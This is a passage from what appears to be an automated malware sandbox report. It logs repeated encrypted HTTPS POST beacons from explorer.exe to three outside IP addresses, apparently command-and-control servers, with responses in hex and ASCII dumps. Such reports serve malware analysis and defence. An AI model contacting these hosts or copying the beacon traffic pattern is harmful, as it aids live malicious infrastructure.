                                                                              2024-07-27 12:55:05 UTC1122OUTData Raw: 51 68 33 7a 50 34 52 4f 62 71 4d 79 46 54 2b 76 67 6f 68 56 73 6a 6c 6c 72 2f 63 55 71 62 5a 66 65 45 34 66 66 51 53 70 2f 69 6d 34 2f 78 58 6a 73 5a 52 6c 4c 67 79 68 35 32 32 7a 6f 53 34 49 46 61 74 38 62 53 46 41 44 42 70 57 54 41 41 74 51 42 34 55 47 36 4e 6e 38 66 6d 6e 4a 68 50 78 41 36 54 51 4f 4f 35 6d 69 4a 78 67 66 5a 6d 54 5a 6d 37 36 36 6b 2f 54 4f 42 79 55 71 43 6f 49 37 35 50 33 4f 67 66 64 58 4b 45 37 30 6f 32 71 67 61 41 6e 53 66 67 62 70 57 56 33 45 47 73 52 2f 4a 74 2f 41 36 56 79 57 42 58 70 4a 35 66 64 43 38 65 61 45 79 69 33 2b 6a 74 79 52 73 6f 35 52 48 69 46 6c 43 47 6a 38 44 56 39 49 74 51 7a 43 36 74 46 77 71 76 54 56 46 69 56 31 39 4b 55 51 79 43 2b 75 58 62 74 4b 48 30 75 57 74 6b 41 73 33 42 4b 6e 51 4b 48 66 6b 76 61 73 2f 78
                                                                              Data Ascii: Qh3zP4RObqMyFT+vgohVsjllr/cUqbZfeE4ffQSp/im4/xXjsZRlLgyh522zoS4IFat8bSFADBpWTAAtQB4UG6Nn8fmnJhPxA6TQOO5miJxgfZmTZm766k/TOByUqCoI75P3OgfdXKE70o2qgaAnSfgbpWV3EGsR/Jt/A6VyWBXpJ5fdC8eaEyi3+jtyRso5RHiFlCGj8DV9ItQzC6tFwqvTVFiV19KUQyC+uXbtKH0uWtkAs3BKnQKHfkvas/x
                                                                              2024-07-27 12:55:06 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:55:06 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:55:06 UTC685INData Raw: 68 31 58 50 72 59 46 76 42 36 6e 50 67 65 56 51 34 30 52 67 4e 2f 34 54 75 52 4e 77 77 67 72 6b 67 37 63 62 66 68 66 50 6d 31 74 37 49 6c 77 74 79 6b 54 59 4b 78 6c 47 53 48 38 38 34 6e 74 70 73 63 4e 50 72 49 77 7a 5a 4f 53 39 6f 63 4f 48 48 31 4b 62 47 70 57 48 49 57 38 72 39 6d 33 74 45 47 42 6b 51 62 47 5a 73 78 4d 47 74 59 4c 4b 4e 56 4b 78 54 51 4b 31 6a 41 6b 30 74 45 56 43 78 6e 76 4b 58 56 34 47 75 6a 6d 61 42 4a 56 72 46 4f 41 67 6e 67 54 79 33 64 53 38 43 6b 47 76 62 7a 70 63 65 55 6b 76 58 78 38 53 38 57 54 36 64 4a 58 6e 62 2f 45 51 39 75 73 2b 6d 5a 52 34 38 69 4e 37 4d 53 2b 69 36 2f 76 47 70 50 54 59 2b 74 54 68 4a 31 4d 65 62 53 4c 64 77 35 62 4c 47 55 55 43 67 71 77 4c 48 38 62 78 2b 6a 49 56 4e 46 50 75 34 6e 77 66 46 35 59 55 55 79 41
                                                                              Data Ascii: h1XPrYFvB6nPgeVQ40RgN/4TuRNwwgrkg7cbfhfPm1t7IlwtykTYKxlGSH884ntpscNPrIwzZOS9ocOHH1KbGpWHIW8r9m3tEGBkQbGZsxMGtYLKNVKxTQK1jAk0tEVCxnvKXV4GujmaBJVrFOAgngTy3dS8CkGvbzpceUkvXx8S8WT6dJXnb/EQ9us+mZR48iN7MS+i6/vGpPTY+tThJ1MebSLdw5bLGUUCgqwLH8bx+jIVNFPu4nwfF5YUUyA


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              69192.168.2.449842107.173.160.1394432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:55:07 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.139
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:55:07 UTC1122OUTData Raw: 46 43 51 38 55 52 44 78 6b 4c 5a 45 73 52 2f 57 30 50 4b 2f 35 69 78 68 57 61 33 48 68 4f 33 71 6a 35 61 44 31 41 7a 4b 36 6c 52 59 44 59 65 35 4b 39 59 59 61 37 32 64 41 45 73 78 74 4b 34 52 6c 48 67 79 6f 50 79 51 77 74 49 76 70 41 4b 64 78 48 7a 6e 4d 70 7a 2b 45 72 4f 68 4b 66 64 44 34 31 4c 49 32 4e 57 6d 4a 6d 4b 61 62 66 50 4a 53 47 72 54 58 46 64 33 61 5a 7a 35 51 4b 62 30 78 4f 77 66 71 46 71 77 31 59 45 46 55 47 44 66 59 32 4d 61 74 76 39 7a 79 2b 49 66 6a 54 6d 5a 68 36 61 78 4d 68 36 78 4c 49 37 72 49 51 67 57 42 6b 37 44 47 64 31 49 33 4a 43 6a 63 36 6d 65 52 36 31 52 4d 6f 63 2f 74 48 30 31 69 63 70 77 4d 72 64 48 49 70 33 6a 6f 31 74 62 56 70 77 43 4d 4b 51 62 37 6e 62 49 64 35 75 61 53 6b 45 6c 48 45 75 4a 76 74 4f 33 33 6a 5a 5a 34 51 75
                                                                              Data Ascii: FCQ8URDxkLZEsR/W0PK/5ixhWa3HhO3qj5aD1AzK6lRYDYe5K9YYa72dAEsxtK4RlHgyoPyQwtIvpAKdxHznMpz+ErOhKfdD41LI2NWmJmKabfPJSGrTXFd3aZz5QKb0xOwfqFqw1YEFUGDfY2Matv9zy+IfjTmZh6axMh6xLI7rIQgWBk7DGd1I3JCjc6meR61RMoc/tH01icpwMrdHIp3jo1tbVpwCMKQb7nbId5uaSkElHEuJvtO33jZZ4Qu
                                                                              2024-07-27 12:55:08 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:55:08 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:55:08 UTC685INData Raw: 64 39 6a 57 78 58 5a 35 77 58 79 58 72 58 62 4c 6f 2b 78 75 44 37 4d 36 55 76 42 69 70 78 34 2b 45 62 77 66 53 55 58 6b 6a 68 57 4e 62 55 58 41 63 68 69 53 70 70 69 33 30 6a 62 71 73 4f 62 57 6f 75 6e 4b 44 39 34 4e 45 74 36 35 2b 4c 46 65 63 4d 52 45 61 36 2b 77 74 42 55 76 66 6e 52 52 2b 65 39 79 4c 4f 6b 44 4d 59 5a 37 73 4f 72 4f 45 4a 4e 74 73 57 59 43 4d 66 4a 6e 34 64 63 70 43 57 33 2b 46 4d 30 4a 4f 33 51 39 79 4c 4e 4a 68 49 65 76 2f 56 36 6a 71 75 64 75 6b 48 6d 53 4c 39 31 47 52 4d 45 76 39 65 31 6f 46 5a 42 58 76 44 5a 52 47 4b 41 44 54 42 69 62 4e 74 68 42 6b 6e 37 4c 70 43 77 74 43 65 66 62 39 4e 68 39 31 2b 76 4e 68 37 47 53 69 31 4c 6c 77 48 79 42 49 34 45 50 2b 75 72 46 4f 66 4c 54 42 54 36 73 52 2b 45 4b 46 79 35 70 2b 6e 2f 50 4f 41 48
                                                                              Data Ascii: d9jWxXZ5wXyXrXbLo+xuD7M6UvBipx4+EbwfSUXkjhWNbUXAchiSppi30jbqsObWounKD94NEt65+LFecMREa6+wtBUvfnRR+e9yLOkDMYZ7sOrOEJNtsWYCMfJn4dcpCW3+FM0JO3Q9yLNJhIev/V6jqudukHmSL91GRMEv9e1oFZBXvDZRGKADTBibNthBkn7LpCwtCefb9Nh91+vNh7GSi1LlwHyBI4EP+urFOfLTBT6sR+EKFy5p+n/POAH


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              70192.168.2.449844167.235.128.1534432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:55:09 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 167.235.128.153
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:55:09 UTC1122OUTData Raw: 61 78 5a 75 50 42 53 49 7a 72 56 5a 41 78 61 58 58 74 6a 38 6e 73 61 66 33 6b 31 67 5a 34 59 4a 63 61 65 36 47 48 57 68 6b 6c 77 63 6e 48 55 54 75 42 4f 72 35 77 32 45 66 46 4a 6b 33 69 52 51 37 44 63 69 72 7a 39 66 6c 73 47 7a 74 55 45 4f 74 74 65 6d 4e 58 78 69 48 46 4f 50 38 48 2f 69 46 71 44 76 6c 38 74 57 4a 61 63 6f 75 62 42 34 56 48 75 65 7a 44 48 47 66 38 68 37 39 42 65 49 7a 4a 54 74 5a 72 6a 59 66 73 76 6b 38 61 70 30 57 79 52 73 6a 48 50 4b 37 52 4e 79 77 4d 6d 42 7a 2b 2b 59 34 72 30 6a 46 6e 73 72 6c 52 54 62 35 2f 5a 73 6d 39 44 43 47 78 63 2b 46 5a 46 44 64 76 4d 66 44 42 4a 47 34 67 53 67 56 52 43 49 61 4d 30 74 33 4e 58 6f 32 67 6d 52 36 47 32 6d 50 65 30 73 67 44 77 2b 63 64 36 33 43 4e 4f 47 51 70 33 34 6a 4c 2b 43 65 78 43 68 51 4c 42
                                                                              Data Ascii: axZuPBSIzrVZAxaXXtj8nsaf3k1gZ4YJcae6GHWhklwcnHUTuBOr5w2EfFJk3iRQ7Dcirz9flsGztUEOttemNXxiHFOP8H/iFqDvl8tWJacoubB4VHuezDHGf8h79BeIzJTtZrjYfsvk8ap0WyRsjHPK7RNywMmBz++Y4r0jFnsrlRTb5/Zsm9DCGxc+FZFDdvMfDBJG4gSgVRCIaM0t3NXo2gmR6G2mPe0sgDw+cd63CNOGQp34jL+CexChQLB
                                                                              2024-07-27 12:55:10 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:55:09 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:55:10 UTC685INData Raw: 6c 52 54 37 47 34 58 7a 64 78 44 52 70 32 72 39 64 78 34 70 42 4d 59 2f 57 58 49 6e 38 59 48 52 77 37 54 59 33 45 58 63 57 64 64 57 6a 5a 34 66 74 48 76 48 32 58 62 4e 63 66 46 4b 30 42 58 6b 42 75 79 57 49 54 56 52 47 63 61 39 79 30 4b 6f 7a 73 74 33 44 45 43 73 47 46 68 41 42 32 49 74 42 43 6b 6f 6d 73 67 39 72 76 35 7a 46 49 61 39 32 76 42 43 65 6b 5a 78 51 46 75 39 4e 55 73 4a 46 54 42 55 50 47 33 43 6b 71 4c 45 69 34 53 41 78 2f 6a 62 7a 4c 7a 57 36 6e 6d 33 33 4e 65 2f 77 66 33 74 6d 4b 58 33 58 4b 4f 37 42 31 36 78 35 64 30 46 6a 39 38 42 41 71 76 33 2f 46 4f 63 42 69 51 44 38 4b 36 47 44 36 6a 39 77 4e 48 65 70 71 77 73 77 6d 41 66 37 30 34 69 6b 63 6b 47 6d 47 49 37 63 58 39 33 71 54 39 63 71 55 76 36 4a 46 31 51 65 43 70 79 68 67 6d 4f 6e 2b 58
                                                                              Data Ascii: lRT7G4XzdxDRp2r9dx4pBMY/WXIn8YHRw7TY3EXcWddWjZ4ftHvH2XbNcfFK0BXkBuyWITVRGca9y0Kozst3DECsGFhAB2ItBCkomsg9rv5zFIa92vBCekZxQFu9NUsJFTBUPG3CkqLEi4SAx/jbzLzW6nm33Ne/wf3tmKX3XKO7B16x5d0Fj98BAqv3/FOcBiQD8K6GD6j9wNHepqwswmAf704ikckGmGI7cX93qT9cqUv6JF1QeCpyhgmOn+X


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              71192.168.2.449845107.173.160.1374432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:55:10 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.137
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1267
                                                                              2024-07-27 12:55:10 UTC1267OUTData Raw: 71 57 31 54 41 4e 43 65 2f 49 30 34 77 6f 59 44 73 6c 30 31 59 70 39 68 4f 75 35 62 42 73 6b 30 73 70 63 63 6b 43 37 77 52 34 44 31 6b 56 53 71 2b 2b 38 74 6a 44 6c 79 35 76 71 6d 31 6a 59 77 6c 64 70 69 79 46 6f 41 54 6c 4b 6a 78 73 4c 6c 31 56 6f 2b 55 45 52 39 67 6e 39 35 38 4d 74 55 63 64 5a 32 34 55 31 32 38 52 73 50 42 74 72 36 31 70 4b 31 72 2b 78 58 46 33 4c 30 52 49 2b 63 61 36 38 43 39 31 61 6e 52 39 42 2b 53 33 42 4a 6f 46 4e 70 2b 78 44 55 7a 71 63 41 79 5a 2f 44 6a 6f 64 45 76 66 4e 50 62 37 35 4f 4e 61 75 4f 77 35 49 4c 57 6e 42 45 6e 2f 36 70 4b 5a 53 33 58 39 4c 57 6f 79 4d 75 37 49 4a 30 50 6a 31 57 76 35 63 53 6b 49 4a 6e 52 6d 47 53 69 4c 45 6c 54 58 36 67 57 45 67 73 6a 4c 71 45 5a 34 70 6c 59 65 70 6a 4c 56 4b 62 48 47 42 52 4e 53 6c
                                                                              Data Ascii: qW1TANCe/I04woYDsl01Yp9hOu5bBsk0spcckC7wR4D1kVSq++8tjDly5vqm1jYwldpiyFoATlKjxsLl1Vo+UER9gn958MtUcdZ24U128RsPBtr61pK1r+xXF3L0RI+ca68C91anR9B+S3BJoFNp+xDUzqcAyZ/DjodEvfNPb75ONauOw5ILWnBEn/6pKZS3X9LWoyMu7IJ0Pj1Wv5cSkIJnRmGSiLElTX6gWEgsjLqEZ4plYepjLVKbHGBRNSl
                                                                              2024-07-27 12:55:12 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:55:12 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:55:12 UTC685INData Raw: 67 4f 49 6a 7a 62 5a 46 37 42 57 6f 69 4a 30 68 74 64 4c 4e 76 4e 5a 6e 4a 38 34 67 79 52 2f 41 4a 65 38 4f 4b 77 56 44 45 33 2b 2b 63 77 38 42 6e 72 76 49 39 37 49 49 5a 50 30 4d 71 6c 71 61 6e 4b 69 54 35 6a 50 47 4c 77 66 47 4d 33 62 71 6d 73 5a 34 41 53 62 61 38 5a 33 2b 2f 46 51 4c 30 6f 31 74 63 2f 6b 2b 35 79 64 48 42 77 41 47 43 74 35 6c 32 4d 55 59 4c 70 54 73 75 42 42 69 44 35 46 53 68 35 42 6e 48 4f 6d 6a 58 47 4c 69 35 45 42 55 49 6e 76 7a 2f 69 34 47 7a 66 66 53 45 4f 66 52 6d 69 76 52 6e 4a 63 54 78 6c 65 6a 52 36 50 36 65 79 46 39 4e 70 79 70 44 6c 47 76 34 6d 62 71 7a 54 34 78 66 4b 61 49 63 64 41 57 73 51 74 78 4c 76 51 63 38 4c 41 37 6a 72 39 61 50 6b 76 70 50 70 32 67 4f 39 42 46 6b 44 74 6c 2f 4a 49 4c 63 58 6b 67 4e 4c 44 61 2b 65 77
                                                                              Data Ascii: gOIjzbZF7BWoiJ0htdLNvNZnJ84gyR/AJe8OKwVDE3++cw8BnrvI97IIZP0MqlqanKiT5jPGLwfGM3bqmsZ4ASba8Z3+/FQL0o1tc/k+5ydHBwAGCt5l2MUYLpTsuBBiD5FSh5BnHOmjXGLi5EBUInvz/i4GzffSEOfRmivRnJcTxlejR6P6eyF9NpypDlGv4mbqzT4xfKaIcdAWsQtxLvQc8LA7jr9aPkvpPp2gO9BFkDtl/JILcXkgNLDa+ew


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              72192.168.2.449846107.173.160.1394432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:55:12 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.139
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:55:12 UTC1122OUTData Raw: 61 34 46 4c 37 55 74 58 44 44 46 78 78 64 59 64 38 2b 7a 35 79 2f 48 33 77 68 70 6e 4c 37 7a 41 61 52 42 72 68 5a 56 69 53 34 37 6a 35 4b 79 4a 7a 38 43 43 4a 38 49 44 30 31 39 4b 58 4b 50 51 56 75 75 6e 58 46 6d 4c 44 62 4a 4b 50 73 70 64 66 74 2b 42 77 63 44 49 35 4e 6b 58 67 35 4c 50 30 43 41 4e 76 61 78 4a 67 4a 61 67 64 48 62 73 75 58 49 6b 43 36 65 6e 45 41 32 78 31 52 49 2f 74 63 49 65 51 4b 79 4e 39 56 41 55 70 35 6f 34 2b 2b 5a 57 32 45 54 56 4b 61 45 2f 7a 77 61 6b 47 62 2b 35 31 36 67 73 49 7a 35 39 38 46 6a 52 45 67 6b 35 63 37 37 36 68 69 32 78 38 4c 74 50 79 75 36 6e 63 71 66 47 70 58 54 6f 71 38 61 5a 5a 38 47 32 34 4a 4e 69 5a 6d 4a 47 54 38 4a 70 35 33 42 57 37 67 44 6b 69 49 42 55 39 38 6c 56 50 30 57 77 39 41 42 38 51 65 6e 73 45 50 6e
                                                                              Data Ascii: a4FL7UtXDDFxxdYd8+z5y/H3whpnL7zAaRBrhZViS47j5KyJz8CCJ8ID019KXKPQVuunXFmLDbJKPspdft+BwcDI5NkXg5LP0CANvaxJgJagdHbsuXIkC6enEA2x1RI/tcIeQKyN9VAUp5o4++ZW2ETVKaE/zwakGb+516gsIz598FjREgk5c776hi2x8LtPyu6ncqfGpXToq8aZZ8G24JNiZmJGT8Jp53BW7gDkiIBU98lVP0Ww9AB8QensEPn
                                                                              2024-07-27 12:55:14 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:55:14 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:55:14 UTC685INData Raw: 46 52 61 31 4a 4a 6d 4a 50 68 57 4a 44 36 4d 74 46 70 4f 79 6f 49 32 52 50 52 6e 59 7a 73 6a 33 4d 7a 4a 6d 43 69 51 6d 52 6e 45 52 39 32 58 54 55 43 77 4d 72 65 71 42 54 59 58 74 51 68 64 74 6c 2f 47 58 56 55 46 54 61 4b 52 30 4e 6f 47 51 51 4a 32 46 79 48 2b 5a 67 7a 6e 42 79 6a 78 2b 59 79 45 66 63 70 79 62 38 5a 39 48 52 6b 30 74 4d 56 79 6f 76 59 49 79 75 6d 71 61 41 38 65 67 34 41 44 55 67 52 6a 6d 35 2f 70 55 32 69 33 52 6e 6c 58 62 74 79 4f 69 4f 4d 54 38 76 6a 4d 62 58 63 79 70 59 5a 45 51 63 55 68 36 34 43 65 71 70 79 63 51 6c 6c 79 2b 78 36 77 30 78 71 72 46 55 66 70 6a 5a 59 45 76 52 52 62 44 73 73 4f 4d 72 39 56 72 36 75 4e 49 44 71 78 54 4d 6d 41 73 49 32 65 42 66 79 7a 4c 68 56 30 61 41 46 57 66 63 57 37 77 50 56 5a 68 58 4e 57 75 69 70 6c
                                                                              Data Ascii: FRa1JJmJPhWJD6MtFpOyoI2RPRnYzsj3MzJmCiQmRnER92XTUCwMreqBTYXtQhdtl/GXVUFTaKR0NoGQQJ2FyH+ZgznByjx+YyEfcpyb8Z9HRk0tMVyovYIyumqaA8eg4ADUgRjm5/pU2i3RnlXbtyOiOMT8vjMbXcypYZEQcUh64CeqpycQlly+x6w0xqrFUfpjZYEvRRbDssOMr9Vr6uNIDqxTMmAsI2eBfyzLhV0aAFWfcW7wPVZhXNWuipl


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              73192.168.2.449848167.235.128.1534432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:55:14 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 167.235.128.153
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:55:14 UTC1122OUTData Raw: 49 67 31 5a 71 6a 54 6b 31 50 74 42 71 4e 45 47 44 78 57 44 4c 43 78 68 6b 46 71 4a 6f 72 63 58 62 7a 74 63 4d 57 6c 7a 78 37 4d 46 6d 79 6c 65 44 31 72 69 36 35 67 7a 56 39 6a 6d 56 65 52 37 2b 45 6b 41 54 7a 35 77 71 32 58 65 6d 30 51 70 61 56 6f 6e 66 4e 33 43 54 6a 42 54 58 74 4d 54 65 66 75 69 5a 74 54 46 63 2f 51 54 61 73 67 64 59 6f 71 72 6b 55 54 52 7a 53 71 71 54 66 34 35 34 62 66 54 4a 76 6c 68 63 62 56 33 4f 72 2b 79 2f 2b 4b 61 48 6c 58 79 75 42 64 35 5a 56 66 78 4a 36 4e 61 74 5a 57 42 53 6f 50 57 77 4a 55 64 34 38 42 50 33 4d 6f 5a 6e 77 49 4c 4d 59 47 53 64 57 56 37 34 34 4d 7a 34 4f 73 4a 37 72 45 35 6b 79 73 31 6c 44 41 61 38 72 73 71 45 72 2f 4d 68 56 6c 75 52 34 6c 34 67 6a 34 6c 4e 32 75 6f 62 50 34 2f 32 32 57 61 55 6c 2f 56 72 72 42
                                                                              Data Ascii: Ig1ZqjTk1PtBqNEGDxWDLCxhkFqJorcXbztcMWlzx7MFmyleD1ri65gzV9jmVeR7+EkATz5wq2Xem0QpaVonfN3CTjBTXtMTefuiZtTFc/QTasgdYoqrkUTRzSqqTf454bfTJvlhcbV3Or+y/+KaHlXyuBd5ZVfxJ6NatZWBSoPWwJUd48BP3MoZnwILMYGSdWV744Mz4OsJ7rE5kys1lDAa8rsqEr/MhVluR4l4gj4lN2uobP4/22WaUl/VrrB
                                                                              2024-07-27 12:55:15 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:55:15 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:55:15 UTC685INData Raw: 68 6c 76 74 4b 70 68 41 64 37 76 37 44 77 73 61 4c 61 65 74 68 73 30 5a 55 71 39 57 59 51 64 47 36 64 43 55 30 51 38 42 6b 5a 66 71 4e 31 66 70 4a 6f 70 2b 4f 4e 76 56 59 37 6e 6d 53 32 79 56 64 6e 69 4c 50 74 6f 31 64 4e 36 57 56 62 30 39 46 68 4c 38 55 41 34 56 73 2b 6f 52 59 42 78 49 4d 78 57 50 54 61 75 47 6d 49 2b 35 6d 67 68 31 78 53 57 4f 41 2f 30 63 77 6a 54 4e 4b 39 41 4e 44 6a 68 34 30 6b 34 4e 75 54 63 34 43 39 41 39 73 46 56 38 66 2f 78 70 46 42 67 64 4c 50 44 4a 47 52 51 4c 67 55 4e 48 31 58 63 47 67 54 77 67 61 70 30 45 38 7a 35 4b 2b 64 61 71 57 53 64 6d 4d 50 36 71 55 66 6e 64 44 56 47 75 71 35 55 30 58 37 4f 44 4b 6a 70 76 45 72 45 49 4b 6e 70 31 6c 64 65 62 73 33 44 77 4b 67 59 49 71 38 55 74 34 56 6d 4d 68 66 61 4b 6f 6e 4c 66 6e 52 36
                                                                              Data Ascii: hlvtKphAd7v7DwsaLaeths0ZUq9WYQdG6dCU0Q8BkZfqN1fpJop+ONvVY7nmS2yVdniLPto1dN6WVb09FhL8UA4Vs+oRYBxIMxWPTauGmI+5mgh1xSWOA/0cwjTNK9ANDjh40k4NuTc4C9A9sFV8f/xpFBgdLPDJGRQLgUNH1XcGgTwgap0E8z5K+daqWSdmMP6qUfndDVGuq5U0X7ODKjpvErEIKnp1ldebs3DwKgYIq8Ut4VmMhfaKonLfnR6


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              74192.168.2.449849107.173.160.1374432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:55:16 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.137
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1267
                                                                              2024-07-27 12:55:16 UTC1267OUTData Raw: 68 33 51 52 37 37 6d 47 51 73 63 32 6d 4c 68 36 6e 56 65 52 4a 31 48 4e 65 45 6e 6e 70 63 55 64 51 66 73 57 5a 6c 34 47 66 44 49 4c 74 75 51 73 4f 31 70 62 42 4e 45 51 47 42 2b 58 57 57 77 2f 78 65 75 70 47 38 78 6d 4f 74 31 39 2f 69 45 31 5a 73 50 44 6a 57 5a 4e 35 4c 31 69 46 79 73 59 41 38 6f 67 6e 41 66 6b 53 6f 61 4d 54 6b 38 44 44 66 4e 6c 64 64 38 77 44 36 6a 46 49 71 46 77 32 51 54 33 4f 4e 64 79 5a 62 64 4f 2f 76 71 35 30 35 43 4d 6b 37 6c 6d 74 6d 51 39 41 52 63 65 6c 4a 6f 2f 32 49 50 31 34 71 4a 69 62 6b 51 6f 55 31 53 38 7a 65 70 79 44 69 36 66 78 41 4c 64 4f 4f 61 2f 7a 72 2b 48 35 53 43 79 48 30 44 4e 43 54 7a 76 63 52 37 6e 77 4e 77 54 37 74 6d 52 69 31 2f 47 7a 5a 46 41 61 7a 6b 62 74 73 78 6e 76 35 33 39 6a 79 70 38 74 6a 78 64 47 52 44
                                                                              Data Ascii: h3QR77mGQsc2mLh6nVeRJ1HNeEnnpcUdQfsWZl4GfDILtuQsO1pbBNEQGB+XWWw/xeupG8xmOt19/iE1ZsPDjWZN5L1iFysYA8ognAfkSoaMTk8DDfNldd8wD6jFIqFw2QT3ONdyZbdO/vq505CMk7lmtmQ9ARcelJo/2IP14qJibkQoU1S8zepyDi6fxALdOOa/zr+H5SCyH0DNCTzvcR7nwNwT7tmRi1/GzZFAazkbtsxnv539jyp8tjxdGRD
                                                                              2024-07-27 12:55:17 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:55:17 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:55:17 UTC685INData Raw: 72 6c 76 2f 62 73 78 76 6d 64 6d 31 36 49 5a 4b 77 56 5a 65 6a 44 65 78 48 44 46 78 51 6d 4d 66 4a 52 45 66 39 73 41 37 4b 41 6d 75 4b 43 66 4a 79 32 49 6f 5a 4a 44 66 75 6b 49 2b 42 72 58 33 2f 59 32 48 36 45 75 43 64 4b 64 37 72 53 67 53 7a 56 48 48 63 67 31 73 6c 47 32 70 46 64 74 6c 43 43 55 43 43 50 52 35 4d 67 42 68 67 6f 54 65 42 73 62 78 33 4a 6e 4e 2f 4b 66 52 64 4a 53 56 79 4c 5a 71 4d 61 58 76 4f 65 63 2f 7a 52 61 38 38 59 45 54 72 54 61 61 50 68 31 6d 78 4d 43 4f 45 2f 33 6e 30 74 66 57 51 5a 50 4e 37 67 76 34 55 47 39 6c 36 38 4c 6c 72 56 5a 77 33 50 77 6d 65 49 70 54 47 43 59 65 4c 7a 64 45 72 6a 67 39 32 45 54 50 57 58 39 77 5a 50 36 4b 70 79 59 32 39 6e 49 61 47 77 49 41 4a 74 37 38 41 74 6b 6c 76 76 4f 4d 44 39 6c 6c 6f 56 31 33 64 38 52
                                                                              Data Ascii: rlv/bsxvmdm16IZKwVZejDexHDFxQmMfJREf9sA7KAmuKCfJy2IoZJDfukI+BrX3/Y2H6EuCdKd7rSgSzVHHcg1slG2pFdtlCCUCCPR5MgBhgoTeBsbx3JnN/KfRdJSVyLZqMaXvOec/zRa88YETrTaaPh1mxMCOE/3n0tfWQZPN7gv4UG9l68LlrVZw3PwmeIpTGCYeLzdErjg92ETPWX9wZP6KpyY29nIaGwIAJt78AtklvvOMD9lloV13d8R


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              75192.168.2.449850107.173.160.1394432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:55:18 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.139
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
